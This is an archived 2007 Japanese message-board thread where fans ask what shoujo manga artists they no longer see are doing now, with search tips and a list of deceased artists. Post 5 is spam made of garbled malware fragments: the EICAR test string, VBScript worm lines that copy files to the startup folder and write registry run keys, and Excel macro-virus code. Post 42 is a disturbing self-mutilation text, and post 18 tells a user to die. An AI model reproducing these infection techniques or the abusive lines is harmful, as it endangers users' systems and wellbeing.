5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

最近見かけない漫画家 その7

1 :花と名無しさん:2007/10/03(水) 22:19:22 ID:???0
「あの作家さんは今、描いているのかな?」という質問はこちらで。
貴重な過去ログもご参照ください。作家さんの思い出ばなしなどもどうぞ。

〔ご依頼の前に〕…手がかりはなるべく具体的で多い方がいいです。
*最低、この板に作家スレがないか検索してください。
*Yahoo!とかGoogleなどの検索サイトで一度は検索してください。
あとネット書店や出版社のサイトで分かることもあります。

(前スレ)最近見かけない漫画家 その7
http://anime2.2ch.net/test/read.cgi/gcomic/1130648250/l50
過去ログ、検索サイトなどは>>2-5くらいまでで。



2 :花と名無しさん:2007/10/03(水) 22:22:18 ID:???0
過去ログで既に情報がでている作家さんも大勢あります。
最低限、過去ログを見てみましょう。見つかる可能性があります。
〔過去ログでの探し方〕⇒「レスを全部読む」をクリック。
★Windowsの場合→「Ctrl+F」キー  ★Macの場合→「コマンド+F」キー
で検索窓が出てきます。

(過去スレ)
最近見かけない漫画家 その6
http://comic6.2ch.net/test/read.cgi/gcomic/1077721990/l50
最近見かけない漫画家 その5
http://comic.2ch.net/test/read.cgi/gcomic/1044100111/l50
最近見かけない漫画家 その4
http://comic.2ch.net/gcomic/kako/1033/10330/1033042789.html
最近見かけない漫画家 その3
http://comic.2ch.net/gcomic/kako/998/998573907.html
最近見かけない漫画家 2
http://salad.2ch.net/gcomic/kako/975/975660064.html
最近見かけない漫画家
http://piza.2ch.net/gcomic/kako/970/970415957.html
(関連スレ)
漫画のタイトル&作者名捜索願(22)
http://comic6.2ch.net/test/read.cgi/gcomic/1128850652/l50
消息不明の漫画家を語ろうかな(漫画サロン板)
http://comic.2ch.net/test/read.cgi/csaloon/1070021861/l50←dat落ち、次スレ立ってない模様
(集積サイト)
2ちゃんねる少女漫画板
「漫画のタイトル&作者名捜索願」スレッドでの依頼とその結果
http://www.geocities.co.jp/AnimeComic-White/1831/sousaku.ht

3 :検索・参考サイト:2007/10/03(水) 22:25:31 ID:???0
(検索サイト)
Google http://www.google.com/intl/ja/
SearchDesk http://www.searchdesk.com/
Yahoo!Japan http://www.yahoo.co.jp/
(本の検索サイト)
Books.or.jp 【本をさがす】http://www.books.or.jp/
Amazon.co.jp http://www.amazon.co.jp/
イーエスブックス http://shopping.yahoo.co.jp/books/
オンライン書店bk1http://www.bk1.co.jp/
(出版社へのリンク)
http://www.hir-net.com/link/book/
http://dir.yahoo.co.jp/Business_and_Economy/Shopping_and_Services/Publishing/Comics/
(参考)
漫画家訃報リスト ttp://picnic.to/~gogowest/main/mourning.htm
★恐怖の追跡〜あの人たちは今?〜 http://www.osk.3web.ne.jp/~elephant/tuiseki/tuiseki.htm
復刊ドットコム http://www.fukkan.com/
…絶版本の復刊交渉中の作家さんのコメント・また復刊情報などが参考になります。



4 :検索サイトなどの役立て方:2007/10/03(水) 22:27:19 ID:???0
*同じ出版社での掲載誌移動
本誌→別冊、幼年誌・少女誌→レディコミ誌、あたりの掲載誌移動が考えられます。
作風にもよりますが少女誌→少年誌・青年誌なども十分あります。
*出版社を移っている場合や移動したジャンルなどによってはペンネーム変更している
場合があります。少女誌→ボーイズなども可能性に入れておいてください。
*挿絵画家として活動している場合があります。
講談社X文庫、集英社コバルト文庫、早川文庫、創元SF・推理文庫、
他、児童書やボーイズの文庫など色々な可能性があります。
*同人活動をしている場合、コミケのカタログで見つけられるかも知れません。
その筋の知り合いの方が無い場合、オークションで検索してみてください。
それで簡単に見つかる場合もあります。
*引退・活動休止・療養されている場合でもデータベースやファンサイトが残ることがあります。
少ないですが作家さんの引退宣言やコメントを預かっているところもあります。


5 :花と名無しさん:2007/10/03(水) 22:46:54 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :〓逝去作家〓:2007/10/03(水) 22:51:19 ID:???0
多田かおる…1998年3月11日逝去 享年38
      ttp://www.minato-pro.com/kaoru/
      ttp://forgirls.hp.infoseek.co.jp/tada.html
三原順…1995年3月20日逝去 享年42
    ttp://www.t3.rim.or.jp/~hylas/Jun_Mihara/index.html
久木田律子…こちら参照。http://www.osk.3web.ne.jp/~elephant/tuiseki/m/k3.html
五彩きょうこ…大手小町トピックスでは「心不全」と記述。
       YOU編集後記に記述、あおば出版の「純愛感動200%」に「冬の春」再録。
銀雪子…ttp://www8.ocn.ne.jp/~troy.com/comic.writer.shirogane.html
山田花子…1992年5月24日逝去 享年24
     ttp://www.begets.co.jp/tvmanga/review/13.html
あなだ もあ…1997年10月24日逝去 享年45
      (ソース:「漫画家・アニメ作家人名事典」 出版社 日外アソシエーツ(紀伊國屋書店))
      http://bookweb.kinokuniya.co.jp/guest/cgi-bin/wshosea.cgi?W-ISBN=4816914234
ねこぢる…1998年5月10日逝去 享年31
     ttp://ja.wikipedia.org/wiki/%E3%81%AD%E3%81%93%E3%81%A2%E3%82%8B
紅水月…1999年11月11日逝去
    ttp://wagamamakorin.client.jp/mouu.html
伊万里すみ子…なくなったのは原作担当の旦那さま。中山星香のサイトに記述あり。
       (官能小説というサイトより)>玖珂みのおさん2003年1月27日永眠 享年55歳
名取ちずる…2004年1月6日逝去 最後のコミックス「ぐるぐる迷路23」最終ページに記述あり。
      ttp://www.asahi-net.or.jp/~QJ4T-SYUJ/natori.htm
あとり硅子…2004年7月6日逝去
      ttp://www.shinshokan.co.jp/comic/topics/atori.html
岡田史子…2005年4月3日逝去 享年55
     ttp://takekuma.cocolog-nifty.com/blog/2005/04/post_21dd.html
かやまゆみ(加山弓)…2005年7月27日逝去
           ttp://diary2.cgiboy.com/2/yumixxx/index.cgi?y=2005&m=7#29
すぎ恵美子…2007年2月10日逝去 享年47
      ttp://anime2.2ch.net/test/read.cgi/gcomic/1136648177/468(チーズ編集部の訃報転載文)
      ttp://cheese.shogakukan.co.jp/info/fuhou01_index.html

7 :逝去作家:2007/10/03(水) 22:52:04 ID:???0
多田かおる…1998年3月11日逝去 享年38
      ttp://www.minato-pro.com/kaoru/
      ttp://forgirls.hp.infoseek.co.jp/tada.html
三原順…1995年3月20日逝去 享年42
    ttp://www.t3.rim.or.jp/~hylas/Jun_Mihara/index.html
久木田律子…こちら参照。ttp://tsuiseki.sakuraweb.com/manga-ka/ku/kukita_ritsuko.html
五彩きょうこ…大手小町トピックスでは「心不全」と記述。
       YOU編集後記に記述、あおば出版の「純愛感動200%」に「冬の春」再録。
銀雪子…ttp://www8.ocn.ne.jp/~troy.com/comic.writer.shirogane.html
山田花子…1992年5月24日逝去 享年24
     ttp://www.begets.co.jp/tvmanga/review/13.html
あなだ もあ…1997年10月24日逝去 享年45
      (ソース:「漫画家・アニメ作家人名事典」 出版社 日外アソシエーツ(紀伊國屋書店))
      http://bookweb.kinokuniya.co.jp/guest/cgi-bin/wshosea.cgi?W-ISBN=4816914234
ねこぢる…1998年5月10日逝去 享年31
     ttp://ja.wikipedia.org/wiki/%E3%81%AD%E3%81%93%E3%81%A2%E3%82%8B
紅水月…1999年11月11日逝去
    ttp://wagamamakorin.client.jp/mouu.html
伊万里すみ子…なくなったのは原作担当の旦那さま。中山星香のサイトに記述あり。
       (官能小説というサイトより)>玖珂みのおさん2003年1月27日永眠 享年55歳
名取ちずる…2004年1月6日逝去 最後のコミックス「ぐるぐる迷路23」最終ページに記述あり。
      ttp://www.asahi-net.or.jp/~QJ4T-SYUJ/natori.htm
あとり硅子…2004年7月6日逝去
      ttp://www.shinshokan.co.jp/comic/topics/atori.html
岡田史子…2005年4月3日逝去 享年55
     ttp://takekuma.cocolog-nifty.com/blog/2005/04/post_21dd.html
かやまゆみ(加山弓)…2005年7月27日逝去
           ttp://diary2.cgiboy.com/2/yumixxx/index.cgi?y=2005&m=7#29
すぎ恵美子…2007年2月10日逝去 享年47
    ttp://ja.wikipedia.org/wiki/%E3%81%99%E3%81%8E%E6%81%B5%E7%BE%8E%E5%AD%90

8 ::2007/10/03(水) 22:58:16 ID:???0
>>1
スレ立て、乙です!

んが、このスレッドは、 最近見かけない漫画 その8 ですw

------------------------------------------------------
あと、前スレ終わり頃の会話より
※回答レスは住人の好意で成り立っています。

※思い出話なのか、
自己検索で探しきれなかった漫画家さんの
捜索を兼ねた質問なのかを明記してくださると嬉しいです。

>>7
すまん。20分時間が開いてたのでレス漏れかと思ってしまい
被ってしまったよ。ローカルあぼ〜んしてくだされ。

9 :花と名無しさん:2007/10/06(土) 01:10:04 ID:???0
ホシュ

10 :花と名無しさん:2007/10/15(月) 23:36:00 ID:???0
今更ながらだけど、このスレ常連小林瑞代の「不思議の国の少年アリス」文庫版買ってきた
めちゃめちゃ気になるところで終わってるんだが、続き描いてくれないのかな。

しかし…ガイシュツだろうけど、なんだあの二巻のあとがきは…

11 :花と名無しさん:2007/10/15(月) 23:38:52 ID:???0
小林瑞代なら最近、男性向けでエロ漫画描いてたな。
2巻のあとがきはガイシュツじゃないけど、なんて書いてあった?

12 :花と名無しさん:2007/10/16(火) 00:07:26 ID:???0
>>11
マジで?!今までググっても近況が全く出ないから、絶賛休業中だと思ってた
教えてくれてありがとう。

そんで二巻のあとがきなんだけど
「精神分析の樹立者フロイトは、精神病の手がかりとして夢の分析をこころみ…
  〜 中  略 〜 (この間フロイトの簡単な経歴と、ユングと、その精神治療の研究解説に1ページ半)
いつの時代も生み出すものは苦しみ、受け取るものは楽しむ。これが大原則であろう。」

なんだかな〜(´・ω・`)

13 :花と名無しさん:2007/10/22(月) 17:23:14 ID:TpOM/jDa0
ほしゅあげ

14 :花と名無しさん:2007/10/24(水) 22:32:58 ID:7MkTHDy4O
村上真紀さんってグラビテーションまだ描いてますか?

12巻までもってて、数年ぶりに思い出したんだけど…

さっき本検索したら12以降探せなかったんだけど…

携帯だからぐぐりづらくて(>_<)

15 :花と名無しさん:2007/10/24(水) 22:38:42 ID:???0
>>12
なんのこっちゃ…
頭イッちゃったのかな…
今の絵は、もう新書館時代の面影は無くて、ただキモいだけの絵になっちゃってた。
いわれなきゃ、小林瑞代ってわからないな。

16 :花と名無しさん:2007/10/24(水) 23:26:10 ID:???O
>>14
通りすがりだが、そしてさらに読んだことはないのだが、懐かしいなと思い、Wikipediaで引いたら出てきましたよ
webで連載しているらしい

17 :花と名無しさん:2007/10/25(木) 07:29:07 ID:Lhl6sr1/O
>>16
ありがとう)^o^(
webで?!
やさしくなーい!!
どうしたら…(>_<)
本化してるのかなぁ?

また探してみます☆

18 :花と名無しさん:2007/10/25(木) 12:35:27 ID:???0
>>17
氏ねばいいのにねw

19 :花と名無しさん:2007/10/26(金) 16:01:32 ID:???0
>>15
マジかー?!
絵が変わったとか、本当ショックだ…

20 :花と名無しさん:2007/10/28(日) 01:23:08 ID:???0
別マでデビューして、その後「まんがタイムジャンボ」などでも執筆されていた北風智子さん。
最近見かけなくて気になっていたのですが、
橋本市社協だよりというHPで同姓同名の方のご子息が「亡母の供養として」寄付をされたという
情報を見かけました。
もしかして、お亡くなりになったのでしょうか?

21 :花と名無しさん:2007/10/30(火) 18:12:30 ID:???0
なかじま優里さんはもう描いていないのかな??
単行本が2003年10月に出てきりでてないけど、ググッってみても情報ないし
でも別マのプロフには載っているんだけどそれ以上の情報がなくて・・・
すごく好きな人だから単行本を心待ちにしているんだけどもう出ないのかなぁ・・・

22 :花と名無しさん:2007/11/02(金) 03:20:08 ID:???0
>>質雑スレ809へ

検索の仕方の問題もありそう。とりあえず2年前までは
コミックス発売しているのがわかる。その後はネット上データではわからないけど…。
作者のfanの記憶が頼りか…?

作者名「飛鳥あると」のみでググる
→講談社レディコミ「Be Love」の公式サイト内作家プロフに行き着く
http://be-love.net/profile/p-asuka.html
→「お受験します!」原作:畑嶺明/作画:飛鳥あると
2001〜2002年にかけてコミクス4巻まで発売済み。

「秋の童話」原作:オ・スヨン/作画:飛鳥あると
(宙出版)2005年10月、コミクス全4巻。
http://www.jbook.co.jp/p/p.aspx/2524032/s(1巻)
http://www.7andy.jp/books/detail?accd=07155335&pg_from=rcmd_detail_1(4巻)

23 :花と名無しさん:2007/11/02(金) 14:42:49 ID:???O
気持ちはわかるが、他スレのレス付けられても…
放って置けないタイプなんだな

24 :花と名無しさん:2007/11/02(金) 22:26:47 ID:???O
>>22
ありがとうございます!!
&ごめんなさい。感謝します。
レディコミ…orz

>>23
私が質問する場所間違えてしまったから…
ホントすみません。

25 :花と名無しさん:2007/11/05(月) 00:22:44 ID:???0
加賀景子さん。「かっこ悪くてあたりまえ」持ってるのですがその後さっぱり見かけない。
御存知の方いらっしゃったら教えてください。

26 :花と名無しさん:2007/11/05(月) 02:16:15 ID:???0
>>25
板違いじゃね?↓が正解なら、数字板へどぞ。
Yahooブックスのカテゴリ:> 耽美 > ビブロス ビーボーイコミックス
ttp://books.yahoo.co.jp/book_detail/18839353



27 :花と名無しさん:2007/11/05(月) 05:59:25 ID:???0
>>24
もう居ないかも知れないけど、レディコミ誌を勘違いしてるのかな?
少女漫画の延長のようなエロ少ない雑誌もあるんだよ。
「お受験します!」は、原作付きだけど以下の通り昼ドラにもなったので、
それなりに人気あったんじゃないかなあ?
ただその後も原作付きで仕事しているので、話作りが苦手な人だったのかもね。

幼稚園ゲーム(2001.2〜3)名古屋制作。主演:奥貫薫、中村繁之
幼稚園ゲーム2(2002.5〜7)
幼稚園ゲーム3(2003.11〜2004.1)

28 :花と名無しさん:2007/11/07(水) 22:04:36 ID:???O
山川あいじ
巻頭下絵事件以来見かけないなーやっぱり追放されたのかな
一応作家スレあるけど、恐ろしくて聞けない

29 :花と名無しさん:2007/11/08(木) 01:50:23 ID:sXeEXkeIO
昨年までChu Chuで時々読み切りを描いていた白鳥希美先生は現在は活動していらっしゃらないのでしょうか?
ググってみましたが今年の活動については見つけられませんでした

30 :花と名無しさん:2007/11/14(水) 21:08:24 ID:VQT+4+RSO
もう10年以上見ないのですが、昔プリンセスで描いていたせがわ真子さんのことわかりませんか?

31 :花と名無しさん:2007/11/14(水) 21:17:17 ID:???0
>>30
今も主婦向け漫画雑誌で描いてるみたいよ。
ときどき立ち読みしてると作品を見かける。

32 :花と名無しさん:2007/11/14(水) 21:50:59 ID:irAPeXgf0
森次矢尋さん
別冊花とゆめに連載していた「高校生探偵 北詰拓シリーズ」はどうなったの?

33 :花と名無しさん:2007/11/14(水) 22:21:52 ID:???0
>>32
つい最近、別冊花ゆめスレで話題になったし、その作品の完結に関しては
何度も既出のループ話題。

結論: 未 完 です。

なぜ、完結していないのかは、白泉社が公表しないので、わかりません。
別花スレでの問い合わせレスをここにもコピペしときます。
※なお、コミックス未収録分が↓で、これが最後の掲載。
「副題:翳りゆく面影」…別冊花とゆめ 2000年10〜12月号 50+40+46P


396 名前:花と名無しさん 投稿日:2007/11/11(日) 10:45:10 ID:???0
森次さんのあのシリーズの続きがすごく読みたくて、ずっと気になっていて、二年前に問い合わせた事がある。
その時の返事↓

「○○様
 いつもご愛読いただき、ありがとうございます。
 お問い合わせいただきました「拓シリーズ」ですが、現在のところ続刊の予定はありません。
 よろしくお願いいたします。 白泉社 花とゆめ編集部」

三行で終了。
どっちの都合(編集なのか作家都合)なのか納得の行く説明もない

34 :花と名無しさん:2007/11/14(水) 22:32:37 ID:irAPeXgf0
〉〉33
ありがとうございます。そうですか。
未完なのですね。
納得のいく説明がほしいものです。

35 :花と名無しさん:2007/11/14(水) 22:35:57 ID:irAPeXgf0
「ナースステーション」の島津郷子さんは?
検索しても、最近のがでてこないのですが?

36 :花と名無しさん:2007/11/15(木) 17:37:26 ID:???O
>>30
"せがわ真子"でGoogle検索すると作品リストを作っているファンサイトが
携帯からも見れます。一時期結婚引退したのち90年代後半より復帰。
ママンガや嫁vs姑雑誌で仕事。作品テイストはあまり昔と変わっていないと
ファンサイトの人の感想あり。

37 :花と名無しさん:2007/11/21(水) 23:59:19 ID:???0
>19
最近エロ漫画のほうを読んで、どっかで見たことある絵柄だなと思ったら小林瑞代だったよ
エロ漫画っぽく描いてあるけど、細かいところは昔とあんまり変わんないかも




38 :花と名無しさん:2007/11/22(木) 23:52:53 ID:35jcTn/g0
山中音和先生の現在を教えてください。

39 :花と名無しさん:2007/11/24(土) 00:57:30 ID:???0
芳原のぞみがコミックエールで少女漫画描いてた
まだがんばってるのね

40 :花と名無しさん:2007/11/24(土) 01:42:41 ID:???O
誘導していただきました。

伊東千江さんは現在活動されておられるんでしょうか?

41 :花と名無しさん:2007/11/24(土) 12:31:09 ID:???O
>>40
携帯でも見れるGoogle検索しろ!"伊東千江"だけで検索すれば
作者本人公式サイトが一発で出る。
プロフィールに漫画家歴あるが、現在はイラストレーターの模様。

42 :花と名無しさん:2007/11/24(土) 14:07:09 ID:X1gDl39nO
自分の体を引き裂きました。
そして自分の肉片をハサミで切りました。
中から蛇が出てきて足下で私を睨み付けていました。麻痺していた感覚が取り戻し喚きました。

43 :花と名無しさん:2007/11/24(土) 14:49:10 ID:v2fepoOoO
小坂理絵先生の漫画がまた読みたいな

44 :花と名無しさん:2007/11/24(土) 15:20:26 ID:???O
井口かのん好きだったなぁ



45 :花と名無しさん:2007/11/24(土) 16:11:37 ID:???0
お願いだからあーみん様を…

46 :花と名無しさん:2007/11/24(土) 16:15:16 ID:i3zUTYWX0
あーみんの実力は認めざるをえないよね

47 :花と名無しさん:2007/11/25(日) 00:27:47 ID:???O
>>31 >>36
情報どうもありがとうございました!
御礼遅くなってすみません。

48 :花と名無しさん:2007/11/25(日) 01:05:57 ID:kRUa6tAkO
飯田晴子さんって知っていますか?
マンガでは生活が大変だかで、マンガ離れてるとか.才能あるひとで気になっているよ。ディ○ニーとコラボなんかもやってないっけか!

いくつか意見あった小林瑞代、自分好きだから、エロでもなんでもまだ書いててくれてうれしい。
女性であの画力は凄い。さすが萩原なんたら(バスタード)のアシだよ.

49 :花と名無しさん:2007/11/25(日) 01:29:01 ID:???0
>>48
前者→なぜかいまだに専用スレありw

【パナ・インサ】飯田晴子【聖ライセンス】
http://anime2.2ch.net/test/read.cgi/gcomic/1147913623/

50 :48:2007/11/25(日) 03:19:40 ID:kRUa6tAkO
>>49まだあったのね!わざわざありがとう、感謝しています(´∀`)
調べときゃヨカタ、失礼;

51 :花と名無しさん:2007/11/29(木) 01:34:12 ID:zuu5yB9PO
高田エミ

あの人の描くぬこタンはほんとに上手かった…。
お月さまーー!!

52 :花と名無しさん:2007/11/29(木) 08:25:19 ID:???O
銀の髪のエラントシリーズの乙樹みどりさんて今どうしているのか知っている方いますか?
ダークムーン掲載分の続きが読みたくてどこかで再開していないかさがしています。

53 :花と名無しさん:2007/11/29(木) 11:36:10 ID:???0
かたつむりの人ってどうしてるの・・・

54 :花と名無しさん:2007/11/29(木) 15:41:22 ID:???0
>>53
誰それ?
伊藤潤二の漫画盗作して賞とった奴?

55 :花と名無しさん:2007/11/29(木) 16:20:37 ID:???0
かたつむり前線の、藤川佳世のことじゃないの?
どうしてるかは知らないけど…

56 :花と名無しさん:2007/11/29(木) 20:15:42 ID:???0
>>52
先月くらいまで大阪で人形展があってました。
漫画家としてはもう活動されていないようです。

57 :花と名無しさん:2007/11/29(木) 21:49:47 ID:???0
>>52
「乙樹みどり」さんなら、中山星香というベテラン無名漫画家の信者っぽくて、
中山さんの公式サイトBBSに登場する「美どり〜む」さんと思われ。
56のレスの通り人形展をやっている時の名前は、乙樹みどりさんのままのようです。

58 :花と名無しさん:2007/11/30(金) 00:38:45 ID:???O
>>56>>57
情報ありがとうございます。
もう漫画家活動なさってないとはショック(*_*)
それと人形展は知りませんでした。

59 :花と名無しさん:2007/11/30(金) 01:15:08 ID:???0
>>58
テンプレ>>1-4辺りを読んで、必ず、グーグル検索をしましょう。
漫画家を完全に廃業したかどうかはわからないけど、
捜索依頼が出ているのはあちこちで見かける。
http://tsuiseki.sakuraweb.com/manga-ka/o/o_midori.html

復刊ドットコム「銀の髪のエラントシリーズ」の投票↓
http://www.fukkan.com/fk/VoteDetail?no=28941

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)